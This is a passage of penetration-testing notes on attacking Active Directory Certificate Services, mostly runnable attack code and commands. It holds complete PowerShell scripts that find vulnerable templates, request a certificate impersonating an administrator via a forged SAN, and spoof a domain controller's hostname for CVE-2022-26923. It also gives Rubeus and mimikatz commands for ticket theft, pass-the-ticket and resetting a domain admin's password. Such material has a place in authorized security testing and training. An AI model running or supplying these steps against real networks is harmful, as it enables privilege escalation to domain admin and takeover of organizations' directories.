Active Directory Certificate Services (AD CS)
- Internal CA
- PKI
- File system encryption
- Digital signatures
- User authentication
- Certificates are not revoked after an account password reset: a certificate issued for a user keeps working until it expires or is revoked manually, regardless of password changes
Certificate Templates
- Extended/Enhanced Key Usage (EKU): defines what the issued certificate may be used for (e.g. Client Authentication)
- Certain parameter combinations in a template can be exploited
- User certificates may be requested by members of the Domain Users group
- Machine certificates may be requested by hosts that are members of the Domain Computers group
Enumeration
certutil -v -template > ct.txt
Exploitable templates should have the following traits:
- Allow Enroll or Allow Full Control permissions for a low-privileged group, so members of that group can request certificates. Find the groups a compromised account belongs to with
  net user <username> /domain
  --> Domain Users, Domain Computers
- A Client Authentication EKU, so the certificate can be used for Kerberos (PKINIT) authentication --> Client Authentication
- The enrollee may supply the subject and the subject alternative name (SAN) in the request. The UPN placed in the SAN is the account the Kerberos ticket is issued for, so any user can be impersonated --> CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
- Caveat: manager approval must be disabled and the template must not require authorized signatures, otherwise the request is pended or rejected instead of issued (check the enrollment flags and the signature count in the certutil output)
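The following is an added example, not part of the original notes, that checks the traits above directly against the template objects in the configuration partition instead of reading the certutil dump by hand. It runs from any domain-joined PowerShell session as an ordinary domain user (the template and CA objects are world-readable) and also reports which CA publishes each flagged template, since an unpublished template cannot be enrolled. The list of low-privileged group names in the regex is an assumption; adjust it to the target domain.

```powershell
# Added example (not from the original notes): flag ESC1-style templates via LDAP.
# Assumes a domain-joined session; any authenticated user can read these objects.
$rootDse  = [ADSI]"LDAP://RootDSE"
$configNC = [string]$rootDse.configurationNamingContext
$pkiBase  = "CN=Public Key Services,CN=Services,$configNC"

# Flag bits, EKU OIDs and the control-access-right GUID come from the AD CS schema
$CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1   # msPKI-Certificate-Name-Flag
$CT_FLAG_PEND_ALL_REQUESTS         = 0x2   # msPKI-Enrollment-Flag (manager approval)
$authEkus = @('1.3.6.1.5.5.7.3.2',         # Client Authentication
              '1.3.6.1.5.2.3.4',           # PKINIT Client Authentication
              '1.3.6.1.4.1.311.20.2.2',    # Smart Card Logon
              '2.5.29.37.0')               # Any Purpose
$enrollGuid   = [Guid]'0e10c968-78fb-11d2-90d4-00c04f79dc55'   # Certificate-Enrollment right
$extendedRight = [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight
$genericAll    = [System.DirectoryServices.ActiveDirectoryRights]::GenericAll
$lowPrivRegex  = 'Domain Users|Domain Computers|Authenticated Users|Everyone'   # assumption

# Which CA publishes which template
$published = @{}
$caSearch = New-Object System.DirectoryServices.DirectorySearcher(
    [ADSI]"LDAP://CN=Enrollment Services,$pkiBase", '(objectClass=pKIEnrollmentService)')
foreach ($ca in $caSearch.FindAll()) {
    $caName = [string]$ca.Properties['cn'][0]
    foreach ($tn in $ca.Properties['certificatetemplates']) {
        $published[[string]$tn] += @($caName)
    }
}

$tSearch = New-Object System.DirectoryServices.DirectorySearcher(
    [ADSI]"LDAP://CN=Certificate Templates,$pkiBase", '(objectClass=pKICertificateTemplate)')
foreach ($res in $tSearch.FindAll()) {
    $t         = $res.GetDirectoryEntry()
    $name      = [string]$t.Properties['cn'].Value
    $nameFlags = [int]$t.Properties['msPKI-Certificate-Name-Flag'].Value
    $enrFlags  = [int]$t.Properties['msPKI-Enrollment-Flag'].Value
    $raSigs    = [int]$t.Properties['msPKI-RA-Signature'].Value
    $ekus      = @($t.Properties['pKIExtendedKeyUsage'] | ForEach-Object { [string]$_ })

    $supplySubject = ($nameFlags -band $CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT) -ne 0
    $noApproval    = ($enrFlags  -band $CT_FLAG_PEND_ALL_REQUESTS) -eq 0
    $noSignatures  = $raSigs -eq 0
    # A template with no EKU at all also allows client authentication
    $authEku = ($ekus.Count -eq 0) -or (@($ekus | Where-Object { $authEkus -contains $_ }).Count -gt 0)

    # Enrollment right: the Certificate-Enrollment extended right, all extended rights, or GenericAll
    $enrollers = foreach ($ace in $t.ObjectSecurity.GetAccessRules($true, $true, [System.Security.Principal.NTAccount])) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $rights    = $ace.ActiveDirectoryRights
        $hasEnroll = (($rights -band $extendedRight) -ne 0) -and
                     ($ace.ObjectType -eq $enrollGuid -or $ace.ObjectType -eq [Guid]::Empty)
        $hasAll    = ($rights -band $genericAll) -eq $genericAll
        if ($hasEnroll -or $hasAll) { $ace.IdentityReference.Value }
    }
    $lowPrivEnroll = @($enrollers | Where-Object { $_ -match $lowPrivRegex })

    if ($supplySubject -and $noApproval -and $noSignatures -and $authEku -and $lowPrivEnroll.Count -gt 0) {
        [pscustomobject]@{
            Template     = $name
            PublishedBy  = ($published[$name] -join ',')
            EnrollableBy = ($lowPrivEnroll -join ',')
            EKUs         = ($ekus -join ',')
        }
    }
}
```

Enrollment rights can also arrive through nested groups or a custom group the compromised user is in, so the regex is a first pass; compare the EnrollableBy column with the output of `net user <username> /domain`. certipy-ad's `find -vulnerable` performs the same checks automatically.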
Certificate Creation
- Win+R --> mmc --> File --> Add/Remove Snap-in --> Certificates (choose My user account; choose Computer account only when running as an administrator and requesting a machine certificate)
- In the main menu: Certificates --> right click on Personal --> All Tasks --> Request New Certificate --> Next --> Next --> select the vulnerable template (here: User Request) --> More information is required to enroll for this certificate --> Subject name: Common Name, CN=concerto && Alternative name: User Principal Name, set to the user to impersonate --> OK --> Enroll
- In the main menu: Personal --> Certificates --> the new certificate
- Right click the certificate --> All Tasks --> Export --> Yes, export the private key --> PFX --> set a password --> save
- An alternative is certipy-ad
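The same request without the MMC clicks, as an added example that is not part of the original notes: a certreq INF in which the enrollee supplies both the subject (CN=concerto, as above) and a SAN carrying the UPN of the user to impersonate, followed by the PFX export. The template name, the CA config string, the UPN, the export password and the file paths are assumptions.

```powershell
# Added example (not from the original notes): ESC1 request via certreq.
$template  = 'VulnTemplate'                   # assumed template with ENROLLEE_SUPPLIES_SUBJECT
$caConfig  = 'dc01.corp.local\corp-DC01-CA'   # assumed CA as <host>\<CA name> (certutil -config - -ping lists it)
$targetUpn = 'administrator@corp.local'       # assumed user to impersonate
$pfxPass   = ConvertTo-SecureString 'ExportPass123!' -AsPlainText -Force   # assumed export password

# The subject AND the SAN are taken from the request because the template lets the
# enrollee supply them; the SAN (OID 2.5.29.17) UPN is what PKINIT maps to an account.
@"
[NewRequest]
Subject = "CN=concerto"
KeyLength = 2048
KeyAlgorithm = RSA
Exportable = TRUE
MachineKeySet = FALSE
RequestType = PKCS10
[RequestAttributes]
CertificateTemplate = $template
[Extensions]
2.5.29.17 = "{text}"
_continue_ = "upn=$targetUpn&"
"@ | Set-Content -Path .\req.inf -Encoding ASCII

certreq -new .\req.inf .\req.csr                        # generate key pair + CSR
certreq -submit -config $caConfig .\req.csr .\cert.cer  # CA issues immediately if no manager approval
certreq -accept .\cert.cer                              # installs into Cert:\CurrentUser\My with the key

# Pick the issued certificate by its SAN and export it with the private key
function Get-SanText([System.Security.Cryptography.X509Certificates.X509Certificate2]$c) {
    $ext = $c.Extensions | Where-Object { $_.Oid.Value -eq '2.5.29.17' }
    if ($ext) { $ext.Format($false) } else { '' }
}
$cert = Get-ChildItem Cert:\CurrentUser\My |
    Where-Object { (Get-SanText $_) -match [regex]::Escape($targetUpn) } |
    Sort-Object NotBefore -Descending | Select-Object -First 1
Export-PfxCertificate -Cert $cert -FilePath .\concerto.pfx -Password $pfxPass
```

The resulting `concerto.pfx` and its password are what the Rubeus `asktgt` step below takes as `/certificate:` and `/password:`. For a machine certificate, run as an administrator and set `MachineKeySet = TRUE`.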
Impersonation
- Request a TGT with the created certificate (PKINIT) and grab it
- On the machine, via Rubeus:
Rubeus.exe asktgt /user:<user (UPN) of cert> /enctype:aes256 /certificate:<path to PFX> /password:<PFX password> /outfile:<name of file to write TGT to.kirbi> /domain:<domain name> /dc:<IP of domain controller>
- Select a domain admin, e.g. by opening Active Directory Users and Computers, and reset their password with the TGT. This only works if the impersonated user has reset-password rights over the target, and it is noisy and destructive (the DA is locked out), so prefer pass-the-ticket where it suffices:
.\Rubeus.exe changepw /ticket:<ticketfilename> /new:<new password> /dc:<domain controller> /targetuser:<domain>\<dauser>
- runas /user:<domain>\<username of DA> cmd.exe
- Alternatively, load the Rubeus outfile via mimikatz to authenticate as the impersonated user against a remote host in the domain:
privilege::debug
kerberos::ptt <name of file to write TGT to.kirbi>
exit
dir \\<hostname>\<share>$\
- Use the hostname in the UNC path, not an IP address, so that Kerberos (and therefore the injected ticket) is used instead of NTLM
CVE-2022-26923 (Certifried)
- Abuses how the subject alternative name (SAN) is built for the default User and Machine certificate templates: the SAN is the identity the certificate authenticates as, so the goal is to make it point to someone with higher privileges
- The User template builds the SAN from the User Principal Name, which a low-privileged user cannot change, so this template cannot be used to escalate privileges
- The Machine template builds the SAN from the computer account's DNS hostname (dNSHostName attribute)
- Members of the Authenticated Users group can create 10 machine accounts by default (ms-DS-MachineAccountQuota), and each of them can request a Machine certificate
- The DNS hostname in the certificate is what the machine is authenticated as
- Service Principal Names (SPN) associate a service logon with a service instance; SPNs must be unique in the forest
- Permissions of interest, both are needed:
  - Validated write to DNS host name allows updating the DNS hostname of the AD object associated with the host
  - Validated write to SPN allows updating the SPN of the AD object associated with the host
Usage
- A user account has to be compromised; use it to enrol a new machine account in the domain
- Remove the SPN attribute of the new machine account first: changing the DNS hostname also rewrites the HOST/ SPNs, and because SPNs must be unique the write would fail against the Domain Controller's existing SPNs
- Alter the DNS hostname attribute of the AD object to that of a Domain Controller (or another higher-privileged machine)
- Request the machine certificate with the default Machine template
- Authenticate via Kerberos (PKINIT) with the certificate as the higher-privileged machine
- Caveat: CAs patched with KB5014754 (May 2022) embed the requester's SID in the certificate, and once strong certificate mapping is enforced the DC maps the certificate to the created machine account, not to the spoofed hostname
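The Usage steps carried out with the ActiveDirectory PowerShell module, as an added example that is not part of the original notes. It runs as the compromised low-privileged user and stops at the AD object manipulation; the certificate is then requested as the new machine account with the Machine template (e.g. certipy-ad `req -template Machine`) and used for PKINIT as in the Impersonation section. The machine account name, its password and the DC hostname are assumptions, and the module (RSAT) is assumed to be available; Powermad's New-MachineAccount or certipy-ad `account create` do the same over LDAP without it.

```powershell
# Added example (not from the original notes): CVE-2022-26923 object manipulation.
Import-Module ActiveDirectory

$newName = 'PWNWS01'              # assumed machine account to create
$newSam  = "$newName`$"
$dcFqdn  = 'dc01.corp.local'      # assumed DC whose dNSHostName is spoofed
$pass    = ConvertTo-SecureString 'MachinePass123!' -AsPlainText -Force   # assumed password

# 1. ms-DS-MachineAccountQuota (default 10) is what lets Authenticated Users add computers
$domainDn = (Get-ADDomain).DistinguishedName
$quota = (Get-ADObject -Identity $domainDn -Properties 'ms-DS-MachineAccountQuota').'ms-DS-MachineAccountQuota'
if ($quota -lt 1) { throw "ms-DS-MachineAccountQuota is $quota; cannot add a machine account" }
New-ADComputer -Name $newName -SamAccountName $newSam -AccountPassword $pass -Enabled $true

# 2. Clear the SPNs first. The validated write to dNSHostName also rewrites the
#    HOST/<name> SPNs, which would collide with the DC's own SPNs (SPNs must be
#    unique), so the hostname change fails while the SPNs are still present.
Set-ADComputer -Identity $newSam -Clear servicePrincipalName

# 3. Point dNSHostName at the DC; the account's creator holds the validated write.
Set-ADComputer -Identity $newSam -DNSHostName $dcFqdn

# Verify: DNSHostName should now be the DC's and the SPN list empty
Get-ADComputer -Identity $newSam -Properties dNSHostName, servicePrincipalName |
    Select-Object SamAccountName, DNSHostName, ServicePrincipalNames
```

Keep the created account name and password: the next step authenticates as `PWNWS01$` to the CA to request the Machine certificate, and the account should be removed (or its dNSHostName restored) once the engagement is over, since a stray object claiming the DC's hostname is easy to spot in the directory.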